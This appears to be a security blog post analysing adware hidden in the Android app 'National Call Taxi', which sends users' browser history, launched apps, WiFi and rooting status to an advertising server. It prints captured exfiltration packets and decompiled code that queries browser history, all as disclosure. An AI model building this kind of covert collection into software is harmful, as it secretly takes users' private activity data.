User Activities Leakage with Free App

The android free app is transferring the device conditions and user activities without the user agreement. An adware included the free app is collecting the internet access data and launched app history on the installed device.

Free app: National Call Taxi – 전국 콜텍시(Korean)
Google Play: https://play.google.com/store/apps/details?id=kr.baccharis.callTaxi

The name of launched app and accessed URL list were sent to the outside server when user execute an app or connect to web with a mobile browser during the ‘National Call Taxi’ app launched or  in background. The malicious code is NOT a part of main source of the app, but it was included the adware module of app for profit.

The malicious data includes internet access URL, access time, applied rooting, WiFi status and device serial number (Not a real UUID, randomly generated).

[Sending Packet(URL Access)]

POST /servlet/Navvy.mawrite3 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 208User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)Host: ma01.mediachannel.co.kr

Connection: Keep-Alive

Accept-Encoding: gzip

ver=2.0.1&collectapp=kr.baccharis.callTaxi&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=web&ldt=20130418162111&nsf=23554400003&wifi=wifi&rooting=0&data=0
http://www.google.co.kr/029.50820130418162111

[Sending Packet(App Execution)]

POST /servlet/Navvy.mawrite3 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 233User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)Host: ma01.mediachannel.co.kr

Connection: Keep-Alive

Accept-Encoding: gzip

ver=2.0.1&collectapp=kr.baccharis.callTaxi&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=app&ldt=20130418162138&nsf=811915200069&wifi=wifi&rooting=0&data=
0201304181620222013041816213876.0com.android.browserandroid

[Sending Information]

–  Malicious App Version and Name
–  Serial Number(Generated random UUID)
–  Type : app(app execution) or web(web access)
–  Wifi and Rooting status
–  Executed App Name or Access URL

I have decompiled the malicious app and reviews the code of malicious functions.

[UUID Generation]


private String w(){

String str = "";

try

{

str = <b>UUID.randomUUID().toString();</b>

new StringBuilder("CreateSerial : ").append(str).toString();

b(str);

label33: return str;

}

catch (Exception localException)

{

break label33;

}

}

[Browser History Access]

unregisterReceiver(this.s);stopSelf();Intent localIntent = new Intent(this, revRankey.class);

localIntent.putExtra("appwebCollect", 4500);

localIntent.setAction("Action.Restart.MediaChannelService");

PendingIntent localPendingIntent = PendingIntent.getBroadcast(this, 0, localIntent, 0);

g.g.set(2, 10000L, localPendingIntent);

if (localObject4 == null)

continue;

((Cursor)localObject4).close();

return;

<b>Cursor localCursor1 = g.e.query(Browser.BOOKMARKS_URI, Browser.HISTORY_PROJECTION, "date > " + g.i, null, "date");</b>

localObject4 = localCursor1;

break;

((Cursor)localObject4).moveToLast();

((Cursor)localObject4).getCount();

localObject5 = "";

if (!((Cursor)localObject4).isBeforeFirst())

continue;

if (localObject1 == null)

continue;

boolean bool1 = localObject1.contentEquals("0");

if (!bool1)

break label509;

if (localObject4 == null)

Some adware are collecting the user behavior and internet access history data. And the advertising companies extract the worth from the data for their marketing. I guess that the web accessing and app launching data of the malicious app would be used for the similar purpose. But, WiFi status and Rooting conditions are able to use breaking into the device. I already posted the issue with Facebook, warning the another app include the adware could be exposed same security issue
.

Advertisements